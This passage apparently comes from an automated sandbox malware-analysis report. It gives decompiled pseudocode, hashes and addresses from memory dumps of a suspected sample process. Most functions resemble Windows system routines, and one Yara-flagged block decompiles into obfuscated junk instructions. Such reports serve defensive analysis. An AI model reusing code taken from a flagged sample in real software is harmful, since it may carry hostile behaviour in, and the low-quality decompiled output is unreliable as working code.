                                  0x034dfea3
                                  0x034dfea8
                                  0x034dfebd

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8017d9c75df4122298b1aac1ca89b0cf028d4dd203216a97c289508175b20e05
                                  • Instruction ID: 32ab21d4b54376af8a5d073b20f8e39131294cb56ad7dad6e788245dc91f2262
                                  • Opcode Fuzzy Hash: 8017d9c75df4122298b1aac1ca89b0cf028d4dd203216a97c289508175b20e05
                                  • Instruction Fuzzy Hash: EF018475A00358AFDB14DFAAD845FAEBBB8EF44700F00406BB901EF391DA709A05C799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 59%
                                  			E034DFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                  				signed int _v12;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				short _v58;
                                  				char _v64;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed char* _t18;
                                  				intOrPtr _t24;
                                  				intOrPtr _t30;
                                  				intOrPtr _t31;
                                  				signed int _t32;
                                  
                                  				_t29 = __edx;
                                  				_t24 = __ebx;
                                  				_v12 =  *0x351d360 ^ _t32;
                                  				_t30 = __edx;
                                  				_t31 = __ecx;
                                  				E0346FA60( &_v64, 0, 0x30);
                                  				_v24 = _a4;
                                  				_v32 = _t31;
                                  				_v28 = _t30;
                                  				_v58 = 0x266;
                                  				if(E03447D50() == 0) {
                                  					_t18 = 0x7ffe0388;
                                  				} else {
                                  					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                  				}
                                  				_push( &_v64);
                                  				_push(0x10);
                                  				_push(0x20402);
                                  				_push( *_t18 & 0x000000ff);
                                  				return E0346B640(E03469AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                  			}
















                                  0x034dfec0
                                  0x034dfec0
                                  0x034dfecf
                                  0x034dfed9
                                  0x034dfede
                                  0x034dfee0
                                  0x034dfeeb
                                  0x034dfef3
                                  0x034dfef6
                                  0x034dfef9
                                  0x034dff04
                                  0x034dff16
                                  0x034dff06
                                  0x034dff0f
                                  0x034dff0f
                                  0x034dff21
                                  0x034dff22
                                  0x034dff24
                                  0x034dff29
                                  0x034dff3e

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 43d632365746f1f27a85bfd542fee273d8443709ba18561f7abe60bea303eb21
                                  • Instruction ID: cd8f1d9b92faf22fdc079f2bfff9ff56e90fbbffe3b034e2b0d1f2fb46478d43
                                  • Opcode Fuzzy Hash: 43d632365746f1f27a85bfd542fee273d8443709ba18561f7abe60bea303eb21
                                  • Instruction Fuzzy Hash: A2017175A00318AFDB14DFA9D845EAEBBB8EB44700F00406BB901AF290DA709A05C799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 54%
                                  			E034F8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                  				signed int _v12;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				intOrPtr _v40;
                                  				short _v66;
                                  				char _v72;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed char* _t18;
                                  				signed int _t32;
                                  
                                  				_t29 = __edx;
                                  				_v12 =  *0x351d360 ^ _t32;
                                  				_t31 = _a8;
                                  				_t30 = _a12;
                                  				_v66 = 0x1c20;
                                  				_v40 = __ecx;
                                  				_v36 = __edx;
                                  				_v32 = _a4;
                                  				_v28 = _a8;
                                  				_v24 = _a12;
                                  				if(E03447D50() == 0) {
                                  					_t18 = 0x7ffe0386;
                                  				} else {
                                  					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                  				}
                                  				_push( &_v72);
                                  				_push(0x14);
                                  				_push(0x20402);
                                  				_push( *_t18 & 0x000000ff);
                                  				return E0346B640(E03469AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                  			}
















                                  0x034f8a62
                                  0x034f8a71
                                  0x034f8a79
                                  0x034f8a82
                                  0x034f8a85
                                  0x034f8a89
                                  0x034f8a8c
                                  0x034f8a8f
                                  0x034f8a92
                                  0x034f8a95
                                  0x034f8a9f
                                  0x034f8ab1
                                  0x034f8aa1
                                  0x034f8aaa
                                  0x034f8aaa
                                  0x034f8abc
                                  0x034f8abd
                                  0x034f8abf
                                  0x034f8ac4
                                  0x034f8ada

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 51a424f320264fce9c32393793debec88821aaa37cb61014872d25f5489ded96
                                  • Instruction ID: 982750dfcf290db8966faac7f1b331656ccabac2f0f8d4680cc7947c7d4bf455
                                  • Opcode Fuzzy Hash: 51a424f320264fce9c32393793debec88821aaa37cb61014872d25f5489ded96
                                  • Instruction Fuzzy Hash: E8011E75A003199FCB00DFA9D9419AEB7B8EF48310F14405AF904EB351D634A901CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 54%
                                  			E034F8ED6(intOrPtr __ecx, intOrPtr __edx) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				short _v62;
                                  				char _v68;
                                  				signed char* _t29;
                                  				intOrPtr _t35;
                                  				intOrPtr _t41;
                                  				intOrPtr _t42;
                                  				signed int _t43;
                                  
                                  				_t40 = __edx;
                                  				_v8 =  *0x351d360 ^ _t43;
                                  				_v28 = __ecx;
                                  				_v62 = 0x1c2a;
                                  				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                  				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                  				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                  				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                  				_v24 = __edx;
                                  				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                  				if(E03447D50() == 0) {
                                  					_t29 = 0x7ffe0386;
                                  				} else {
                                  					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                  				}
                                  				_push( &_v68);
                                  				_push(0x1c);
                                  				_push(0x20402);
                                  				_push( *_t29 & 0x000000ff);
                                  				return E0346B640(E03469AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                  			}


















                                  0x034f8ed6
                                  0x034f8ee5
                                  0x034f8eed
                                  0x034f8ef0
                                  0x034f8efa
                                  0x034f8f03
                                  0x034f8f0c
                                  0x034f8f15
                                  0x034f8f24
                                  0x034f8f27
                                  0x034f8f31
                                  0x034f8f43
                                  0x034f8f33
                                  0x034f8f3c
                                  0x034f8f3c
                                  0x034f8f4e
                                  0x034f8f4f
                                  0x034f8f51
                                  0x034f8f56
                                  0x034f8f69

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f7ec3c30be9d3381ad661ea90229cf74a78c48b7599c3ac3bc57a44bab2af682
                                  • Instruction ID: 2b060e591076fa6be46393de66d2acb9877e7c26da028977f87fdb5d61783170
                                  • Opcode Fuzzy Hash: f7ec3c30be9d3381ad661ea90229cf74a78c48b7599c3ac3bc57a44bab2af682
                                  • Instruction Fuzzy Hash: 8D111E74A002599FDB04DFA9D441BAEFBF4FF08300F0442AAE518EF381E6349941CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0342DB60(signed int __ecx) {
                                  				intOrPtr* _t9;
                                  				void* _t12;
                                  				void* _t13;
                                  				intOrPtr _t14;
                                  
                                  				_t9 = __ecx;
                                  				_t14 = 0;
                                  				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                  					_t13 = 0xc000000d;
                                  				} else {
                                  					_t14 = E0342DB40();
                                  					if(_t14 == 0) {
                                  						_t13 = 0xc0000017;
                                  					} else {
                                  						_t13 = E0342E7B0(__ecx, _t12, _t14, 0xfff);
                                  						if(_t13 < 0) {
                                  							L0342E8B0(__ecx, _t14, 0xfff);
                                  							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                  							_t14 = 0;
                                  						} else {
                                  							_t13 = 0;
                                  							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                  						}
                                  					}
                                  				}
                                  				 *_t9 = _t14;
                                  				return _t13;
                                  			}







                                  0x0342db64
                                  0x0342db66
                                  0x0342db6b
                                  0x0342dbaa
                                  0x0342db71
                                  0x0342db76
                                  0x0342db7a
                                  0x0342dba3
                                  0x0342db7c
                                  0x0342db87
                                  0x0342db8b
                                  0x03484fa1
                                  0x03484fb3
                                  0x03484fb8
                                  0x0342db91
                                  0x0342db96
                                  0x0342db98
                                  0x0342db98
                                  0x0342db8b
                                  0x0342db7a
                                  0x0342db9d
                                  0x0342dba2

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                  • Instruction ID: 8cd562629d9d2b013d5b71461794ca045810d541ea50a6393fd1b1b37c2a916a
                                  • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                  • Instruction Fuzzy Hash: 78F0CD375056329FD332D6564490B57BE559FC3650F55003BF225BF344C960880246DC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0342B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                  				signed char* _t13;
                                  				intOrPtr _t22;
                                  				char _t23;
                                  
                                  				_t23 = __edx;
                                  				_t22 = __ecx;
                                  				if(E03447D50() != 0) {
                                  					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                  				} else {
                                  					_t13 = 0x7ffe0384;
                                  				}
                                  				if( *_t13 != 0) {
                                  					_t13 =  *[fs:0x30];
                                  					if((_t13[0x240] & 0x00000004) == 0) {
                                  						goto L3;
                                  					}
                                  					if(E03447D50() == 0) {
                                  						_t13 = 0x7ffe0385;
                                  					} else {
                                  						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                  					}
                                  					if(( *_t13 & 0x00000020) == 0) {
                                  						goto L3;
                                  					}
                                  					return E034A7016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                  				} else {
                                  					L3:
                                  					return _t13;
                                  				}
                                  			}






                                  0x0342b1e8
                                  0x0342b1ea
                                  0x0342b1f3
                                  0x03484a17
                                  0x0342b1f9
                                  0x0342b1f9
                                  0x0342b1f9
                                  0x0342b201
                                  0x03484a21
                                  0x03484a2e
                                  0x00000000
                                  0x00000000
                                  0x03484a3b
                                  0x03484a4d
                                  0x03484a3d
                                  0x03484a46
                                  0x03484a46
                                  0x03484a55
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0342b20a
                                  0x0342b20a
                                  0x0342b20a
                                  0x0342b20a

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                  • Instruction ID: bf351621bb540e81aa97e8d8cf8e3db58692ca930eea12f1f8b6827e1a29f14b
                                  • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                  • Instruction Fuzzy Hash: 7901AD32200A909FD322E75AC808BAABF98EF51750F0D04A3E9249F7A1D678C801826C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 34%
                                  			E0040C9EF(signed int __eax, void* __ebx, signed int __ecx, signed int __edx, void* __fp0) {
                                  				signed int _t9;
                                  				void* _t12;
                                  				signed int _t15;
                                  				void* _t16;
                                  				void* _t20;
                                  
                                  				_pop(ss);
                                  				_t9 = __eax & 0x7cced1fa;
                                  				_t15 = __ecx &  *__ecx;
                                  				 *_t9 =  *_t9 ^ __edx;
                                  				_t12 =  *_t15;
                                  				 *_t15 = __ebx;
                                  				asm("outsb");
                                  				asm("cmc");
                                  				asm("int 0xfd");
                                  				_pop(_t16);
                                  				asm("cmc");
                                  				asm("scasd");
                                  				asm("aad 0x82");
                                  				_pop(ds);
                                  				if(_t16 + 1 >= 0) {
                                  					 *((intOrPtr*)(_t12 - 0x3874eb3c)) =  *((intOrPtr*)(_t12 - 0x3874eb3c)) + 1;
                                  					return _t20;
                                  				} else {
                                  					asm("popad");
                                  					asm("repe ror byte [edi+0x3], 1");
                                  					 *0x323ae7e7 = _t9;
                                  					return _t9;
                                  				}
                                  			}








                                  0x0040c9f4
                                  0x0040c9f5
                                  0x0040c9fa
                                  0x0040c9fd
                                  0x0040c9ff
                                  0x0040c9ff
                                  0x0040ca04
                                  0x0040ca05
                                  0x0040ca06
                                  0x0040ca0b
                                  0x0040ca0c
                                  0x0040ca11
                                  0x0040ca12
                                  0x0040ca14
                                  0x0040ca17
                                  0x0040ca96
                                  0x0040ca9f
                                  0x0040ca19
                                  0x0040ca19
                                  0x0040ca1a
                                  0x0040ca1e
                                  0x0040ca2d
                                  0x0040ca2d

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fdaebdf72d167c8380de76e1bcea7ff755707a9e161135055e73f29e1eefebd3
                                  • Instruction ID: 7e92ba3304fe7831e0c160bd42e24136254f0bb59589ab254eefe5c1eb0a654d
                                  • Opcode Fuzzy Hash: fdaebdf72d167c8380de76e1bcea7ff755707a9e161135055e73f29e1eefebd3
                                  • Instruction Fuzzy Hash: 2DF02B77E041048ACB169E9DF0815F4F760EA4713A32492BFDA1E9F256CA369057CFC9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E034BFE87(intOrPtr __ecx) {
                                  				signed int _v8;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				signed int _v24;
                                  				intOrPtr _v28;
                                  				short _v54;
                                  				char _v60;
                                  				signed char* _t21;
                                  				intOrPtr _t27;
                                  				intOrPtr _t32;
                                  				intOrPtr _t33;
                                  				intOrPtr _t34;
                                  				signed int _t35;
                                  
                                  				_v8 =  *0x351d360 ^ _t35;
                                  				_v16 = __ecx;
                                  				_v54 = 0x1722;
                                  				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                  				_v28 =  *((intOrPtr*)(__ecx + 4));
                                  				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                  				if(E03447D50() == 0) {
                                  					_t21 = 0x7ffe0382;
                                  				} else {
                                  					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                  				}
                                  				_push( &_v60);
                                  				_push(0x10);
                                  				_push(0x20402);
                                  				_push( *_t21 & 0x000000ff);
                                  				return E0346B640(E03469AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                  			}
















                                  0x034bfe96
                                  0x034bfe9e
                                  0x034bfea1
                                  0x034bfead
                                  0x034bfeb3
                                  0x034bfeb9
                                  0x034bfec3
                                  0x034bfed5
                                  0x034bfec5
                                  0x034bfece
                                  0x034bfece
                                  0x034bfee0
                                  0x034bfee1
                                  0x034bfee3
                                  0x034bfee8
                                  0x034bfefb

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c7ae8292fc86c29f6e19224bfaa595d885e71892271e9b295892e8ec1ba9b1ca
                                  • Instruction ID: 101ef3862a36bfd2fb7ceb1781eb551e6130031b8bf35c4e179b9773d35d9d9a
                                  • Opcode Fuzzy Hash: c7ae8292fc86c29f6e19224bfaa595d885e71892271e9b295892e8ec1ba9b1ca
                                  • Instruction Fuzzy Hash: 09016274A00308AFCB14DFA9D941A6EB7F4EF04300F14416AA518DF392DA35DA06DB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 48%
                                  			E034E131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                  				signed int _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				short _v50;
                                  				char _v56;
                                  				signed char* _t18;
                                  				intOrPtr _t24;
                                  				intOrPtr _t30;
                                  				intOrPtr _t31;
                                  				signed int _t32;
                                  
                                  				_t29 = __edx;
                                  				_v8 =  *0x351d360 ^ _t32;
                                  				_v20 = _a4;
                                  				_v12 = _a8;
                                  				_v24 = __ecx;
                                  				_v16 = __edx;
                                  				_v50 = 0x1021;
                                  				if(E03447D50() == 0) {
                                  					_t18 = 0x7ffe0380;
                                  				} else {
                                  					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  				}
                                  				_push( &_v56);
                                  				_push(0x10);
                                  				_push(0x20402);
                                  				_push( *_t18 & 0x000000ff);
                                  				return E0346B640(E03469AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                  			}















                                  0x034e131b
                                  0x034e132a
                                  0x034e1330
                                  0x034e1336
                                  0x034e133e
                                  0x034e1341
                                  0x034e1344
                                  0x034e134f
                                  0x034e1361
                                  0x034e1351
                                  0x034e135a
                                  0x034e135a
                                  0x034e136c
                                  0x034e136d
                                  0x034e136f
                                  0x034e1374
                                  0x034e1387

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b3b7acc525a154beb035a2a7daf9b9b1aa9befa0875bd0cf65678479bfa93014
                                  • Instruction ID: 4cfb1f8f92b86a57dc677715d5ac62b6222c3e2137b15b0ed971075bdd5c5755
                                  • Opcode Fuzzy Hash: b3b7acc525a154beb035a2a7daf9b9b1aa9befa0875bd0cf65678479bfa93014
                                  • Instruction Fuzzy Hash: 04013175A01348AFDB04EFA9D545AAEB7F4FF08700F10445AB815EF351E6749A00CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 48%
                                  			E034F8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                  				signed int _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				short _v50;
                                  				char _v56;
                                  				signed char* _t18;
                                  				intOrPtr _t24;
                                  				intOrPtr _t30;
                                  				intOrPtr _t31;
                                  				signed int _t32;
                                  
                                  				_t29 = __edx;
                                  				_v8 =  *0x351d360 ^ _t32;
                                  				_v16 = __ecx;
                                  				_v50 = 0x1c2c;
                                  				_v24 = _a4;
                                  				_v20 = _a8;
                                  				_v12 = __edx;
                                  				if(E03447D50() == 0) {
                                  					_t18 = 0x7ffe0386;
                                  				} else {
                                  					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                  				}
                                  				_push( &_v56);
                                  				_push(0x10);
                                  				_push(0x402);
                                  				_push( *_t18 & 0x000000ff);
                                  				return E0346B640(E03469AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                  			}















                                  0x034f8f6a
                                  0x034f8f79
                                  0x034f8f81
                                  0x034f8f84
                                  0x034f8f8b
                                  0x034f8f91
                                  0x034f8f94
                                  0x034f8f9e
                                  0x034f8fb0
                                  0x034f8fa0
                                  0x034f8fa9
                                  0x034f8fa9
                                  0x034f8fbb
                                  0x034f8fbc
                                  0x034f8fbe
                                  0x034f8fc3
                                  0x034f8fd6

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a991b71878598d741999d478255ff05d76fcf407f01e39141b92346a1f2aeab0
                                  • Instruction ID: ca6a268d4680f9cd6bcee9e9ce8a91e98841a7670ef1338a48a7560d963a20cd
                                  • Opcode Fuzzy Hash: a991b71878598d741999d478255ff05d76fcf407f01e39141b92346a1f2aeab0
                                  • Instruction Fuzzy Hash: 04013174A00209AFDB00EFA9D545AAEB7F4EF48300F14445AB915EF391DA74DA00DB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E034E1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                  				signed int _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				short _v46;
                                  				char _v52;
                                  				signed char* _t15;
                                  				intOrPtr _t21;
                                  				intOrPtr _t27;
                                  				intOrPtr _t28;
                                  				signed int _t29;
                                  
                                  				_t26 = __edx;
                                  				_v8 =  *0x351d360 ^ _t29;
                                  				_v12 = _a4;
                                  				_v20 = __ecx;
                                  				_v16 = __edx;
                                  				_v46 = 0x1024;
                                  				if(E03447D50() == 0) {
                                  					_t15 = 0x7ffe0380;
                                  				} else {
                                  					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  				}
                                  				_push( &_v52);
                                  				_push(0xc);
                                  				_push(0x20402);
                                  				_push( *_t15 & 0x000000ff);
                                  				return E0346B640(E03469AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                  			}














                                  0x034e1608
                                  0x034e1617
                                  0x034e161d
                                  0x034e1625
                                  0x034e1628
                                  0x034e162b
                                  0x034e1636
                                  0x034e1648
                                  0x034e1638
                                  0x034e1641
                                  0x034e1641
                                  0x034e1653
                                  0x034e1654
                                  0x034e1656
                                  0x034e165b
                                  0x034e166e

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 13528f9dff6cc2f6ee556e09985b303d4fe5be2e2bd0ac37be9e7c7ef12910d9
                                  • Instruction ID: 67c255fa20c761f8567dbae832077b20dc4e78d61a88f0a0c54edce7a79e7032
                                  • Opcode Fuzzy Hash: 13528f9dff6cc2f6ee556e09985b303d4fe5be2e2bd0ac37be9e7c7ef12910d9
                                  • Instruction Fuzzy Hash: 91F06275A00358EFDB04EFA9D405E6EB7F4FF14300F04406AA915EF391EA349900CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0344C577(void* __ecx, char _a4) {
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t17;
                                  				void* _t19;
                                  				void* _t20;
                                  				void* _t21;
                                  
                                  				_t18 = __ecx;
                                  				_t21 = __ecx;
                                  				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0344C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x34011cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                  					__eflags = _a4;
                                  					if(__eflags != 0) {
                                  						L10:
                                  						E034F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                  						L9:
                                  						return 0;
                                  					}
                                  					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                  					if(__eflags == 0) {
                                  						goto L10;
                                  					}
                                  					goto L9;
                                  				} else {
                                  					return 1;
                                  				}
                                  			}









                                  0x0344c577
                                  0x0344c57d
                                  0x0344c581
                                  0x0344c5b5
                                  0x0344c5b9
                                  0x0344c5ce
                                  0x0344c5ce
                                  0x0344c5ca
                                  0x00000000
                                  0x0344c5ca
                                  0x0344c5c4
                                  0x0344c5c8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0344c5ad
                                  0x00000000
                                  0x0344c5af

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52caa16b4f30eb5024c29198b600a98f51ee2f2e091dcd7aa43d31187f8e5ed7
                                  • Instruction ID: b05496174b35bce686dba929f1294870c95ea55b78b1af0521a798611d3f0236
                                  • Opcode Fuzzy Hash: 52caa16b4f30eb5024c29198b600a98f51ee2f2e091dcd7aa43d31187f8e5ed7
                                  • Instruction Fuzzy Hash: FEF06DB29176B0EEF7A5C6148084B2ABBD89B05660F4C84BBD4158F241D6B4DC80C258
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 54%
                                  			E0346927A(void* __ecx) {
                                  				signed int _t11;
                                  				void* _t14;
                                  
                                  				_t11 = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                  				if(_t11 != 0) {
                                  					E0346FA60(_t11, 0, 0x98);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                  					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                  					E034692C6(_t11, _t14);
                                  				}
                                  				return _t11;
                                  			}





                                  0x03469295
                                  0x03469299
                                  0x0346929f
                                  0x034692aa
                                  0x034692ad
                                  0x034692ae
                                  0x034692af
                                  0x034692b0
                                  0x034692b4
                                  0x034692bb
                                  0x034692bb
                                  0x034692c5

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                  • Instruction ID: d5d3b27b5a53d4d0cfc529a0449df36cdb2ad9861928c4eb7fb5412d515a43c1
                                  • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                  • Instruction Fuzzy Hash: CFE0ED723406006BE761EE0ADC80B1376A9EF82B20F04407EB9001E282CAF6D80887A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E034E2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                  				void* __esi;
                                  				signed char _t3;
                                  				signed char _t7;
                                  				void* _t19;
                                  
                                  				_t17 = __ecx;
                                  				_t3 = E034DFD22(__ecx);
                                  				_t19 =  *0x351849c - _t3; // 0x7d44584e
                                  				if(_t19 == 0) {
                                  					__eflags = _t17 -  *0x3518748; // 0x0
                                  					if(__eflags <= 0) {
                                  						E034E1C06();
                                  						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                  						__eflags = _t3;
                                  						if(_t3 != 0) {
                                  							L5:
